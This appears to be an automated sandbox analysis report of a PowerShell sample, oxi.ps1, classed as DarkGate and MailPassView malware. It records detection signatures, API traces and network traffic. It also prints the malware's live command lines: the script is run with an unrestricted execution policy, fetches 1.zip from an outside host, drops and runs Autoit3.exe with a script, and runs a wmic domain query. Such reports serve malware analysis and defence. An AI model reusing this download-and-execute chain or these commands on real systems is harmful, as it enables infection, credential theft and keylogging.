Windows Analysis Report
oxi.ps1

Overview

General Information

Sample name: oxi.ps1
Analysis ID: 1448082
MD5: f391262039244472c29e2b3b788a4a79
SHA1: b6db78ac395a0191883670595a88bd0fa52a87f8
SHA256: d28c416add7fe55e7b1a20e30013e870cfb2eb3c9a5962ed4047766a43fa4f5e
Tags: ps1
Infos:

Detection

DarkGate, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DarkGate
Yara detected MailPassView
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
DarkGate First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: oxi.ps1 Virustotal: Detection: 12% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 88.3% probability
Machine Learning detection for dropped file
Source: C:\downloads\Autoit3.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 167.235.238.203:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\downloads\Autoit3.exe Code function: 3_2_00864005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00864005
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0086C2FF
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_0086494A
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_0086CD9F
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086CD14 FindFirstFileW,FindClose, 3_2_0086CD14
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0086F5D8
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0086F735
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0086FA36
Source: C:\downloads\Autoit3.exe Code function: 3_2_00863CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00863CE2
Source: C:\downloads\Autoit3.exe Code function: 3_2_011D2F39 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_011D2F39
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D1F314 FindFirstFileW,FindNextFileW,FindClose, 3_2_03D1F314
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D1DF18 FindFirstFileW,lstrcmpW,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FindNextFileW,FindClose, 3_2_03D1DF18
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CF9DF0 FindFirstFileW,FindNextFileW,FindClose, 3_2_03CF9DF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kostumn1.ilabserver.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\downloads\Autoit3.exe Code function: 3_2_008729BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 3_2_008729BA
Source: global traffic HTTP traffic detected: GET /1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kostumn1.ilabserver.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: kostumn1.ilabserver.com
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCBAEC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kostumn1.ilabserver.com
Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Autoit3.exe, 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp, Autoit3.exe.0.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000000.00000002.1778733653.0000024DC9FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB14D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCB467000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCBC11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kostumn1.ilabsX
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kostumn1.ilabserver.com
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCA1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1778733653.0000024DCB76C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kostumn1.ilabserver.com/1.zip
Source: powershell.exe, 00000000.00000002.1794320678.0000024DDA024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Autoit3.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 00000000.00000002.1778733653.0000024DCAAE6000.00000004.00000800.00020000.00000000.sdmp, Autoit3.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 167.235.238.203:443 -> 192.168.2.4:49730 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\downloads\Autoit3.exe Code function: 3_2_00874632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 3_2_00874632
Contains functionality to modify clipboard data
Source: C:\downloads\Autoit3.exe Code function: 3_2_00874830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_00874830
Contains functionality to read the clipboard data
Source: C:\downloads\Autoit3.exe Code function: 3_2_00874632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 3_2_00874632
Contains functionality to record screenshots
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D00DAC GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 3_2_03D00DAC
Contains functionality to retrieve information about pressed keystrokes
Source: C:\downloads\Autoit3.exe Code function: 3_2_00860508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 3_2_00860508
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Potential key logger detected (key state polling based)
Source: C:\downloads\Autoit3.exe Code function: 3_2_0088D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_0088D164
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: Autoit3.exe PID: 7524, type: MEMORYSTR
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CF3704 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject, 3_2_03CF3704

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7276.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7276, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\downloads\Autoit3.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CECBF4 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount, 3_2_03CECBF4
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D17B38 NtDuplicateObject,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose,NtClose, 3_2_03D17B38
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D17A90 NtQueryObject, 3_2_03D17A90
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D17A5C NtDuplicateObject,NtClose, 3_2_03D17A5C
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D17DDC Sleep,TerminateThread,NtClose,NtClose, 3_2_03D17DDC
Contains functionality to communicate with device drivers
Source: C:\downloads\Autoit3.exe Code function: 3_2_008642D5: CreateFileW,DeviceIoControl,CloseHandle, 3_2_008642D5
Contains functionality to launch a process as a different user
Source: C:\downloads\Autoit3.exe Code function: 3_2_00858F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 3_2_00858F2E
Contains functionality to shutdown / reboot the system
Source: C:\downloads\Autoit3.exe Code function: 3_2_00865778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 3_2_00865778
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B95337D 0_2_00007FFD9B95337D
Source: C:\downloads\Autoit3.exe Code function: 3_2_00801663 3_2_00801663
Source: C:\downloads\Autoit3.exe Code function: 3_2_00809C80 3_2_00809C80
Source: C:\downloads\Autoit3.exe Code function: 3_2_008223F5 3_2_008223F5
Source: C:\downloads\Autoit3.exe Code function: 3_2_00888400 3_2_00888400
Source: C:\downloads\Autoit3.exe Code function: 3_2_00836502 3_2_00836502
Source: C:\downloads\Autoit3.exe Code function: 3_2_0080E6F0 3_2_0080E6F0
Source: C:\downloads\Autoit3.exe Code function: 3_2_0083265E 3_2_0083265E
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082282A 3_2_0082282A
Source: C:\downloads\Autoit3.exe Code function: 3_2_008389BF 3_2_008389BF
Source: C:\downloads\Autoit3.exe Code function: 3_2_00880A3A 3_2_00880A3A
Source: C:\downloads\Autoit3.exe Code function: 3_2_00836A74 3_2_00836A74
Source: C:\downloads\Autoit3.exe Code function: 3_2_00810BE0 3_2_00810BE0
Source: C:\downloads\Autoit3.exe Code function: 3_2_0085EDB2 3_2_0085EDB2
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082CD51 3_2_0082CD51
Source: C:\downloads\Autoit3.exe Code function: 3_2_00880EB7 3_2_00880EB7
Source: C:\downloads\Autoit3.exe Code function: 3_2_00868E44 3_2_00868E44
Source: C:\downloads\Autoit3.exe Code function: 3_2_00836FE6 3_2_00836FE6
Source: C:\downloads\Autoit3.exe Code function: 3_2_0080B020 3_2_0080B020
Source: C:\downloads\Autoit3.exe Code function: 3_2_008233B7 3_2_008233B7
Source: C:\downloads\Autoit3.exe Code function: 3_2_008094E0 3_2_008094E0
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082F409 3_2_0082F409
Source: C:\downloads\Autoit3.exe Code function: 3_2_0081D45D 3_2_0081D45D
Source: C:\downloads\Autoit3.exe Code function: 3_2_0080F6A0 3_2_0080F6A0
Source: C:\downloads\Autoit3.exe Code function: 3_2_008216B4 3_2_008216B4
Source: C:\downloads\Autoit3.exe Code function: 3_2_0081F628 3_2_0081F628
Source: C:\downloads\Autoit3.exe Code function: 3_2_008278C3 3_2_008278C3
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082DBA5 3_2_0082DBA5
Source: C:\downloads\Autoit3.exe Code function: 3_2_00821BA8 3_2_00821BA8
Source: C:\downloads\Autoit3.exe Code function: 3_2_00839CE5 3_2_00839CE5
Source: C:\downloads\Autoit3.exe Code function: 3_2_0081DD28 3_2_0081DD28
Source: C:\downloads\Autoit3.exe Code function: 3_2_00821FC0 3_2_00821FC0
Source: C:\downloads\Autoit3.exe Code function: 3_2_0082BFD6 3_2_0082BFD6
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CEC0EC 3_2_03CEC0EC
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D04824 3_2_03D04824
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CE4E3C 3_2_03CE4E3C
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D10DDC 3_2_03D10DDC
Source: C:\downloads\Autoit3.exe Code function: 3_2_03D0F7F4 3_2_03D0F7F4
Source: C:\downloads\Autoit3.exe Code function: 3_2_03CCD782 3_2_03CCD782
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\downloads\Autoit3.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Found potential string decryption / allocating functions
Source: C:\downloads\Autoit3.exe Code function: String function: 03CC46D0 appears 32 times
Source: C:\downloads\Autoit3.exe Code function: String function: 00820D17 appears 70 times
Source: C:\downloads\Autoit3.exe Code function: String function: 00828B30 appears 42 times
Source: C:\downloads\Autoit3.exe Code function: String function: 03CC6A70 appears 77 times
Source: C:\downloads\Autoit3.exe Code function: String function: 03CF82D8 appears 32 times
Source: C:\downloads\Autoit3.exe Code function: String function: 03CC4714 appears 70 times
Source: C:\downloads\Autoit3.exe Code function: String function: 00811A36 appears 34 times
Source: C:\downloads\Autoit3.exe Code function: String function: 03CC4440 appears 102 times
Source: C:\downloads\Autoit3.exe Code function: String function: 03CC49B0 appears 96 times
Source: C:\downloads\Autoit3.exe Code function: String function: 03CE746C appears 98 times
Yara signature match
Source: amsi64_7276.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7276, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winPS1@11/12@1/1
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086A6AD GetLastError,FormatMessageW, 3_2_0086A6AD
Source: C:\downloads\Autoit3.exe Code function: 3_2_00858DE9 AdjustTokenPrivileges,CloseHandle, 3_2_00858DE9
Source: C:\downloads\Autoit3.exe Code function: 3_2_00859399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 3_2_00859399
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 3_2_0086B976
Source: C:\downloads\Autoit3.exe Code function: 3_2_00864148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 3_2_00864148
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086C9DA CoInitialize,CoCreateInstance,CoUninitialize, 3_2_0086C9DA
Source: C:\downloads\Autoit3.exe Code function: 3_2_0086443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 3_2_0086443D
Source: C:\downloads\Autoit3.exe File created: C:\Users\user\AppData\Roaming\HdaEKeA Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czenej3t.2ah.ps1 Jump to behavior
Source: C:\downloads\Autoit3.exe Command line argument: 3_2_00815F8B
Source: C:\downloads\Autoit3.exe Command line argument: 3_2_00815F8B
Source: C:\downloads\Autoit3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\downloads\Autoit3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: oxi.ps1 Virustotal: Detection: 12%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x
Source: C:\downloads\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\downloads\Autoit3.exe "C:\downloads\Autoit3.exe" c:\\downloads\script.a3x Jump to behavior
Source: C:\downloads\Autoit3.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ComputerSystem get domain Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
